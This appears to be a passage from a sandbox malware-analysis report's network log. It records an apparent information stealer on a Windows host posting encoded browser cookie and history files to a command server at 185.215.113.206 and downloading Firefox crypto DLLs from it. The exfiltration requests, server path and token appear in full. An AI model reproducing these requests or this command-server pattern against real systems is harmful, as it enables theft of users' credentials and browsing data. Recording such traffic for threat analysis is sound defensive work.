Nov 4, 2024 17:33:04.116755009 CET	1236	IN	Data Raw: f6 b4 19 bc 7b f4 f4 12 a5 e8 91 28 e3 30 22 52 ae dc 72 91 34 51 b6 92 c5 4f 45 22 7f 19 29 52 02 b4 bd 0f 57 a9 3f 20 28 4a 34 9a a0 8f 34 6a 7c 7a 3b 45 31 2b a4 7c 30 0f a3 2f 61 52 f6 79 db 07 26 42 4c 25 de 66 30 c1 62 1e 91 d5 18 0c e4 9a Data Ascii: {(0"Rr4QOE")RW? (J44j\|z;E1+\|0/aRy&BL%f0b9"g,@j3`aT("-t!_t%T({"] 0M+Cg`} B\|?r4u*v1n#5/?tP;t)?T(bQ
Nov 4, 2024 17:33:04.116766930 CET	1236	IN	Data Raw: 03 a3 1b 29 85 8b 68 e8 ce cf 82 28 06 af 99 95 df 4f 00 30 82 c7 2a 52 ba c6 4e 99 7d 0d ab 80 ae ea 2a d8 e1 e3 55 30 af 0b 94 17 8a 2b 61 53 cc 2b 52 23 e0 6f 03 e4 2e cd e8 ab e2 6c d4 17 27 83 60 21 cf 1b 38 61 10 af 00 23 2a 53 60 08 27 05 Data Ascii: )h(O0RN}U0+aS+R#o.l'`!8a#S`'-)2U_W2)^vte'>/:CaXo+ r/F1m(N.#+&sc)+a*xsS7e6of$kFV[)/(
Nov 4, 2024 17:33:04.116782904 CET	1236	IN	Data Raw: 3e e5 3f 27 e0 e0 1f 29 d6 c5 9e 48 5e af 25 a0 30 28 2b 74 17 59 0b ac 15 e2 b3 2e 9f a0 f3 17 f1 31 06 08 b9 ef 21 a0 fe ba 0d cc 07 49 2b 81 ba 50 47 50 e0 a0 5b 21 ff a3 d7 8b 55 0b 74 4c e6 c5 1b 49 9a ef 2a 70 a2 94 1c f7 e3 b1 fa 1b d9 97 Data Ascii: >?')H^%0(+tY.1!I+PGP[!UtLIpSA'oX'+6 "z"/p8^eC ROc7_HH+/Wev3\**'SRBVR3c0\fF)kx17Sm(._Af+RJK
Nov 4, 2024 17:33:04.116795063 CET	648	IN	Data Raw: d5 e0 e5 31 e3 c5 43 4e f1 03 2b 82 e1 0e 33 d8 e3 98 13 4f 01 06 9c 3b ba 05 ac 4e fc af 5b a1 d7 5b 67 4d 27 6c 5c 22 66 98 12 25 60 29 16 68 0e d5 5a b7 d2 30 2c 24 d2 e6 38 38 c2 04 4f f4 95 82 25 94 e6 6f bc 99 f1 04 27 c4 bf d6 c1 28 2e 17 Data Ascii: 1CN+3O;N[[gM'l\"f%`)hZ0,$88O%o'(.='(3F"Z+m`#Y0%(Y3D?fLZk2?W_0A/')l\|';fKm(.s<n='=hc&~\vb/Q+
Nov 4, 2024 17:33:04.121649981 CET	1236	IN	Data Raw: 52 b2 89 28 59 4d 18 7e f8 d8 1f fd 55 26 91 42 70 7a d3 3e 1c b3 0b 3f 2e 39 eb 45 a1 44 f7 f1 95 88 75 64 dc 5e 66 1b a2 2f 67 34 0e e5 69 d8 65 df ba 57 b6 82 26 df 2d e2 c5 6f 32 26 8b e3 05 08 9f 99 fd 05 cc 80 4a b0 38 d9 26 65 cf 2b 12 ab Data Ascii: R(YM~U&Bpz>?.9EDud^f/g4ieW&-o2&J8&e+[KsV.wpzC.sVQ{P_mgHp40 U)%N4W)gyI5G-K@veNYDHQ~&E&<7If$Wl"B$1&d#\|&a8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	50110	185.215.113.206	80	2472	C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:03.937021017 CET	203	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHDBGDHDAECBGDHJKFI Host: 185.215.113.206 Content-Length: 3087 Connection: Keep-Alive Cache-Control: no-cache
Nov 4, 2024 17:33:03.937053919 CET	3087	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 30 30 31 31 Data Ascii: ------IEHDBGDHDAECBGDHJKFIContent-Disposition: form-data; name="token"ba0011eb5cb8393f4bb3cf6c55991471198386426b49dd779ec1090f8a810cfb70e61fa3------IEHDBGDHDAECBGDHJKFIContent-Disposition: form-data; name="file_name"Y29va2llc1xNa
Nov 4, 2024 17:33:05.406090975 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:33:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 4, 2024 17:33:06.041126013 CET	565	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCB Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 30 30 31 31 65 62 35 63 62 38 33 39 33 66 34 62 62 33 63 66 36 63 35 35 39 39 31 34 37 31 31 39 38 33 38 36 34 32 36 62 34 39 64 64 37 37 39 65 63 31 30 39 30 66 38 61 38 31 30 63 66 62 37 30 65 36 31 66 61 33 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="token"ba0011eb5cb8393f4bb3cf6c55991471198386426b49dd779ec1090f8a810cfb70e61fa3------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="file"------AFHDAKJKFCFBGCBGDHCB--
Nov 4, 2024 17:33:06.813131094 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:33:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 4, 2024 17:33:08.575030088 CET	94	OUT	GET /746f34465cf17784/freebl3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 4, 2024 17:33:08.854767084 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:33:08 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Nov 4, 2024 17:33:08.854825020 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b Data Ascii: UhOt8]h1]UWVEtu}UMt"0(h&40jVjjRQP?^_]USWVhO?t0
Nov 4, 2024 17:33:08.854835987 CET	1236	IN	Data Raw: 55 07 08 00 83 c4 08 eb ce cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 83 ec 58 89 4c 24 2c 8b 7d 1c a1 b4 30 0a 10 31 e8 89 44 24 50 c7 44 24 3c 10 00 00 00 83 ff 18 72 19 89 f8 83 e0 07 75 12 8d 47 f8 3b 45 14 76 14 68 03 e0 ff Data Ascii: UUSWVXL$,}01D$PD$<ruG;Evhh\|$,}uT$4D$0P\|OL$8PVS'D$@?@L$L$D$D$D$$
Nov 4, 2024 17:33:08.854847908 CET	1236	IN	Data Raw: 55 89 e5 53 57 56 83 ec 24 8b 4d 1c 8b 75 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 7d 08 8d 59 f8 83 f9 10 75 32 8d 45 dc 8d 4d e0 6a 10 ff 75 18 6a 10 50 51 57 e8 f7 93 06 00 83 c4 18 89 c7 8d 75 e8 83 45 dc f8 c7 45 d8 00 00 00 00 85 ff 0f 85 b4 01 Data Ascii: USWV$Mu01E}Yu2EMjujPQWuEEC1;]vS{EE1uuSPVEPo9]SUYY)ZYEME]M)19D
Nov 4, 2024 17:33:08.854954958 CET	1236	IN	Data Raw: 00 00 00 0f 57 c8 0f 11 8c 0e 9c 00 00 00 83 c1 20 83 c3 fe 75 a6 eb 02 31 c9 f6 c2 01 74 28 0f 10 04 0f 0f 10 4c 0e 0c 0f 57 c8 0f 10 84 0e 8c 00 00 00 0f 11 4c 0e 0c 0f 10 0c 0f 0f 57 c8 0f 11 8c 0e 8c 00 00 00 31 db 8b 55 ac 39 c2 74 6b f6 c2 Data Ascii: W u1t(LWLW1U9tkt0T0U19t<f.0L0L0LL09uM17L^_[]USWVh1
Nov 4, 2024 17:33:08.854968071 CET	1236	IN	Data Raw: f0 8d 86 00 ff ff ff 3d 00 ff ff ff 77 0a 68 0e e0 ff ff e9 d0 00 00 00 8b 45 08 85 c0 0f 84 c0 00 00 00 8d 9d f0 fe ff ff 68 00 01 00 00 68 20 21 08 10 50 e8 28 f9 07 00 83 c4 0c bf 00 01 00 00 0f 1f 80 00 00 00 00 56 ff 75 0c 53 e8 0f f9 07 00 Data Ascii: =whEhh !P(VuS)9wWuSufDT>\>=t%>>f1h
Nov 4, 2024 17:33:08.854978085 CET	1236	IN	Data Raw: 45 d0 0f 84 a4 00 00 00 89 55 e0 89 5d dc 8b 45 ec 04 01 89 4d d4 0f b6 c8 8a 5d e8 8b 55 f0 8a 24 0a 00 e3 0f b6 f3 8b 55 f0 8a 3c 32 8b 55 f0 88 3c 0a 8b 55 f0 88 24 32 00 e7 0f b6 f7 8b 4d 10 8a 21 8b 4d f0 32 24 31 8b 4d d4 8b 55 e4 88 22 ba Data Ascii: EU]EM]U$U<2U<U$2M!M2$1MU")UtDEU$U<2U<U$2MaM2$1MUbu-]En~uMMUEEM]}7
Nov 4, 2024 17:33:08.854990959 CET	784	IN	Data Raw: 04 0f 82 3a 03 00 00 0f b6 c9 89 4d ec 31 c0 89 d1 89 7d e4 89 5d dc 66 0f 1f 84 00 00 00 00 00 89 45 e8 8b 55 e4 8b 04 02 89 45 d4 8b 45 e8 8b 55 ec 8d 44 02 01 89 d3 0f b6 c0 8b 7d f0 0f b6 14 07 00 d1 0f b6 f1 8a 34 37 88 34 07 88 14 37 00 d6 Data Ascii: :M1}]fEUEEUD}4747EED}4}4EUEUu}<7}<U2u4EUU}4}
Nov 4, 2024 17:33:08.855451107 CET	1236	IN	Data Raw: 3b 75 c8 0f 83 c7 fe ff ff 8b 55 ec 01 ca 01 cf 01 4d dc 83 7d d8 00 0f 85 c4 fc ff ff 8b 45 f0 88 90 00 01 00 00 88 98 01 01 00 00 e9 74 fe ff ff 89 f8 89 cf 83 7d d8 00 0f 85 fd fd ff ff 8b 45 f0 89 f9 88 88 00 01 00 00 88 90 01 01 00 00 e9 50 Data Ascii: ;uUM}Et}EPEE},7,7E@2CM.USWV\2tRAA q$]QD1A@
Nov 4, 2024 17:33:08.855488062 CET	1236	IN	Data Raw: ce 8b 48 44 89 8d 34 ff ff ff 8b 55 c8 11 ca 8b bd 60 ff ff ff 01 fe 89 75 b4 13 55 98 31 d3 89 5d 94 89 d3 8b 85 64 ff ff ff 31 f0 89 85 64 ff ff ff 8b 4d ec 03 4d 94 89 4d ec 8b 55 e0 11 c2 89 55 e0 31 cf 8b 75 98 31 d6 89 f9 0f a4 f1 08 0f a4 Data Ascii: HD4U`uU1]d1dMMMUU1u1tpH8}pLE]d1]1U]uuEE11E}tBP`MBTD]HM}
Nov 4, 2024 17:33:12.106713057 CET	94	OUT	GET /746f34465cf17784/mozglue.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 4, 2024 17:33:12.385709047 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:33:12 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Nov 4, 2024 17:33:14.276611090 CET	95	OUT	GET /746f34465cf17784/msvcp140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 4, 2024 17:33:14.555193901 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:33:14 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Nov 4, 2024 17:33:16.064373970 CET	91	OUT	GET /746f34465cf17784/nss3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 4, 2024 17:33:16.577069998 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:33:16 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Nov 4, 2024 17:33:16.578185081 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:33:16 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Nov 4, 2024 17:33:18.408992052 CET	95	OUT	GET /746f34465cf17784/softokn3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 4, 2024 17:33:18.700790882 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:33:18 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Nov 4, 2024 17:33:18.913522005 CET	99	OUT	GET /746f34465cf17784/vcruntime140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 4, 2024 17:33:19.192303896 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:33:19 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Nov 4, 2024 17:33:20.190537930 CET	203	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIIEBAAFBFBAKFIDBAFH Host: 185.215.113.206 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Nov 4, 2024 17:33:20.901232004 CET	1236	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIIEBAAFBFBAKFIDBAFH Host: 185.215.113.206 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 49 49 45 42 41 41 46 42 46 42 41 4b 46 49 44 42 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 30 30 31 31 65 62 35 63 62 38 33 39 33 66 34 62 62 33 63 66 36 63 35 35 39 39 31 34 37 31 31 39 38 33 38 36 34 32 36 62 34 39 64 64 37 37 39 65 63 31 30 39 30 66 38 61 38 31 30 63 66 62 37 30 65 36 31 66 61 33 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 42 41 41 46 42 46 42 41 4b 46 49 44 42 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 61 47 6c 7a 64 47 39 79 65 56 78 4e 62 33 70 70 62 47 78 68 49 45 5a 70 63 6d 56 6d 62 33 68 66 64 6a 5a 36 59 32 68 6f 61 48 59 75 5a 47 56 6d 59 58 56 73 64 43 31 79 5a 57 78 6c 59 58 4e 6c 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 42 41 41 46 42 46 42 41 4b 46 49 44 42 41 46 48 0d 0a 43 6f 6e 74 65 6e 